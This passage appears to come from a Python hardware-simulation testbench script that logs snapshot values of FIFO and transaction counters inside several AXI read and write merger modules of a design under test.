logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge215.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge215.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge3.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge3.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge3.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge3.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge3.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge3.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge3.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge3.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_win_fifo.int_count"))
